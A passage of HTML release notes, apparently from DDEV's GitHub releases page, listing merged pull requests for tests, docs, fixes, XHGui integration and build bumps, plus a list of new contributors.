<li>test: attempt to fix the returned 503 error on ee tests [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2926771981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7114" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7114/hovercard" href="https://github.com/ddev/ddev/pull/7114">#7114</a></li>
<li>test: symfony bats tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923396031" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7102" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7102/hovercard" href="https://github.com/ddev/ddev/pull/7102">#7102</a></li>
<li>docs: Update quickstart.md to remove Drupal CMS zip file instructions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/phenaproxima/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/phenaproxima">@phenaproxima</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2929100589" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7119" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7119/hovercard" href="https://github.com/ddev/ddev/pull/7119">#7119</a></li>
<li>test: adding silverstripe quickstart bats test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2926609632" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7112" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7112/hovercard" href="https://github.com/ddev/ddev/pull/7112">#7112</a></li>
<li>test: craftcms bats test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2925397626" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7107" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7107/hovercard" href="https://github.com/ddev/ddev/pull/7107">#7107</a></li>
<li>docs: ddev debug rebuild is great for debugging [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2929851487" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7120" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7120/hovercard" href="https://github.com/ddev/ddev/pull/7120">#7120</a></li>
<li>test: bats test for Statamic Composer quickstart [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2926923962" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7116" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7116/hovercard" href="https://github.com/ddev/ddev/pull/7116">#7116</a></li>
<li>test: add OpenMage/Magento 1 quickstart test and split it from Magento 2, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2922600563" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7094" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7094/hovercard" href="https://github.com/ddev/ddev/issues/7094">#7094</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sreichel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sreichel">@sreichel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2921349142" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7091" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7091/hovercard" href="https://github.com/ddev/ddev/pull/7091">#7091</a></li>
<li>feat: show config.<em>.y</em>ml on ddev start by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2920643809" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7089" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7089/hovercard" href="https://github.com/ddev/ddev/pull/7089">#7089</a></li>
<li>fix: make linkspector ignorePatterns work properly, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2824162450" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6951" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/6951/hovercard" href="https://github.com/ddev/ddev/pull/6951">#6951</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2933003120" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7125" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7125/hovercard" href="https://github.com/ddev/ddev/pull/7125">#7125</a></li>
<li>docs: Add docs about configuring browser for HTTPS certificates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MurzNN/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MurzNN">@MurzNN</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2916022009" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7075" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7075/hovercard" href="https://github.com/ddev/ddev/pull/7075">#7075</a></li>
<li>test: adjust openmage bats test assertions to the now available demo content by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2933235017" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7126" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7126/hovercard" href="https://github.com/ddev/ddev/pull/7126">#7126</a></li>
<li>build: remove go toolchain, bump docker library to 28.0.2, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2901680865" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7057" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7057/hovercard" href="https://github.com/ddev/ddev/pull/7057">#7057</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2934666899" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7127" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7127/hovercard" href="https://github.com/ddev/ddev/pull/7127">#7127</a></li>
<li>test: improve <code>ddev debug test</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2935166801" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7128" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7128/hovercard" href="https://github.com/ddev/ddev/pull/7128">#7128</a></li>
<li>docs: ignore mutagen links in linkspector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2935627217" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7129" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7129/hovercard" href="https://github.com/ddev/ddev/pull/7129">#7129</a></li>
<li>docs: fix example file name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2938622133" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7130" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7130/hovercard" href="https://github.com/ddev/ddev/pull/7130">#7130</a></li>
<li>fix: sanitize <code>~/.ddev/project_list.yaml</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2939421963" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7132" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7132/hovercard" href="https://github.com/ddev/ddev/issues/7132">#7132</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2941099119" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7136" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7136/hovercard" href="https://github.com/ddev/ddev/pull/7136">#7136</a></li>
<li>fix: set <code>NO_PROXY=*</code> in ddev-router to allow internal connections, use default Traefik config file location by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2928427503" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7118" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7118/hovercard" href="https://github.com/ddev/ddev/pull/7118">#7118</a></li>
<li>feat: Integrate XHGui into DDEV, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2784687344" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6894" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6894/hovercard" href="https://github.com/ddev/ddev/issues/6894">#6894</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2914426090" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7069" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7069/hovercard" href="https://github.com/ddev/ddev/pull/7069">#7069</a></li>
<li>refactor: remove solrtail from installed example commands, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943626479" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7139" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7139/hovercard" href="https://github.com/ddev/ddev/issues/7139">#7139</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shelane/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shelane">@shelane</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943672044" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7140" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7140/hovercard" href="https://github.com/ddev/ddev/pull/7140">#7140</a></li>
<li>fix: don't override <code>generic</code> type in <code>ddev config --update</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2887138002" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7035" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7035/hovercard" href="https://github.com/ddev/ddev/issues/7035">#7035</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943122860" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7137" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7137/hovercard" href="https://github.com/ddev/ddev/pull/7137">#7137</a></li>
<li>build: migrate golangci-lint to v2, bump golangci/golangci-lint-action from 6 to 7 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943795465" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7141" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7141/hovercard" href="https://github.com/ddev/ddev/pull/7141">#7141</a></li>
<li>fix: reload app hooks after uninstalling ddev-xhgui add-on, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2946884700" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7144" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7144/hovercard" href="https://github.com/ddev/ddev/issues/7144">#7144</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2947042748" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7145" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7145/hovercard" href="https://github.com/ddev/ddev/pull/7145">#7145</a></li>
<li>fix: make <code>DDEV_PAGER</code> optional, update docs for <code>PAGER</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2884770540" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7032" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7032/hovercard" href="https://github.com/ddev/ddev/issues/7032">#7032</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943292160" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7138" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7138/hovercard" href="https://github.com/ddev/ddev/pull/7138">#7138</a></li>
<li>fix: db warning on <code>config --update</code> should only be shown for default db type by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2946820935" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7143" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7143/hovercard" href="https://github.com/ddev/ddev/pull/7143">#7143</a></li>
<li>fix: remove XHGui volume for <code>/run/nginx</code>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2914426090" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7069" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7069/hovercard" href="https://github.com/ddev/ddev/pull/7069">#7069</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2945918094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7142" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7142/hovercard" href="https://github.com/ddev/ddev/pull/7142">#7142</a></li>
<li>fix: don't auto show release notes in windows installer, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2897793508" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7049" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7049/hovercard" href="https://github.com/ddev/ddev/pull/7049">#7049</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2947913241" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7147" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7147/hovercard" href="https://github.com/ddev/ddev/pull/7147">#7147</a></li>
<li>feat: add MutagenSync annotation for custom commands, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2900874577" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7053" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7053/hovercard" href="https://github.com/ddev/ddev/pull/7053">#7053</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2932732956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7124" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7124/hovercard" href="https://github.com/ddev/ddev/pull/7124">#7124</a></li>
<li>docs: Add the xhgui container to the building and contributing page. Add more description to the xhprof profiling page. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PierrePaul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PierrePaul">@PierrePaul</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2958897102" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7168" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7168/hovercard" href="https://github.com/ddev/ddev/pull/7168">#7168</a></li>
<li>fix: use <code>charset=utf8mb4</code> in DATABASE_URL for Symfony environment variables, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2914068614" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7068" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7068/hovercard" href="https://github.com/ddev/ddev/issues/7068">#7068</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RubenColpaert/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RubenColpaert">@RubenColpaert</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2916743723" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7076" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7076/hovercard" href="https://github.com/ddev/ddev/pull/7076">#7076</a></li>
<li>fix: correct status color formatting in <code>ddev describe</code> and <code>ddev list</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2955657306" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7158" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7158/hovercard" href="https://github.com/ddev/ddev/pull/7158">#7158</a></li>
<li>fix: use correct autoloader for XHGui php-profiler, preinstall it in ddev-webserver, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2958932300" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7170" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7170/hovercard" href="https://github.com/ddev/ddev/issues/7170">#7170</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2960156327" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7172" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7172/hovercard" href="https://github.com/ddev/ddev/pull/7172">#7172</a></li>
<li>docs: update Craft CMS quickstart, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2925397626" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7107" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7107/hovercard" href="https://github.com/ddev/ddev/pull/7107">#7107</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2955966296" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7160" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7160/hovercard" href="https://github.com/ddev/ddev/pull/7160">#7160</a></li>
<li>feat: backdrop add bee to quickstart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/laryn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/laryn">@laryn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2900874577" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7053" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7053/hovercard" href="https://github.com/ddev/ddev/pull/7053">#7053</a></li>
<li>build: bump actions/setup-python from 5.4.0 to 5.5.0 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2960810314" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7173" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7173/hovercard" href="https://github.com/ddev/ddev/pull/7173">#7173</a></li>
<li>fix: show router URLs in <code>ddev describe</code> and <code>ddev list</code> when ephemeral by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2952486823" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7152" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7152/hovercard" href="https://github.com/ddev/ddev/pull/7152">#7152</a></li>
<li>build: bump XHGui image to 0.23, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2945918094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7142" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7142/hovercard" href="https://github.com/ddev/ddev/pull/7142">#7142</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2956515643" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7161" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7161/hovercard" href="https://github.com/ddev/ddev/pull/7161">#7161</a></li>
<li>feat: Implement amplitude tracking for xhprof_mode, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2958897418" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7169" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7169/hovercard" href="https://github.com/ddev/ddev/issues/7169">#7169</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2961063293" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7175" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7175/hovercard" href="https://github.com/ddev/ddev/pull/7175">#7175</a></li>
<li>fix: delete third-party built images on <code>ddev delete</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2950084951" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7150" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7150/hovercard" href="https://github.com/ddev/ddev/pull/7150">#7150</a></li>
<li>test: Add OpenMage composer quickstart and tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sreichel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sreichel">@sreichel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2939890423" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7133" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7133/hovercard" href="https://github.com/ddev/ddev/pull/7133">#7133</a></li>
<li>build: bump images to v1.24.4 for release, and docker-compose to v2.34.0, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2938725637" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7131" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7131/hovercard" href="https://github.com/ddev/ddev/issues/7131">#7131</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2956556885" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7162" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7162/hovercard" href="https://github.com/ddev/ddev/pull/7162">#7162</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nickchomey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nickchomey">@nickchomey</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918705956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7080" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7080/hovercard" href="https://github.com/ddev/ddev/pull/7080">#7080</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/damms005/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/damms005">@damms005</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2919875466" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7084" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7084/hovercard" href="https://github.com/ddev/ddev/pull/7084">#7084</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/phenaproxima/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/phenaproxima">@phenaproxima</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2929100589" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7119" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7119/hovercard" href="https://github.com/ddev/ddev/pull/7119">#7119</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shelane/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shelane">@shelane</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943672044" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7140" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7140/hovercard" href="https://github.com/ddev/ddev/pull/7140">#7140</a></li>
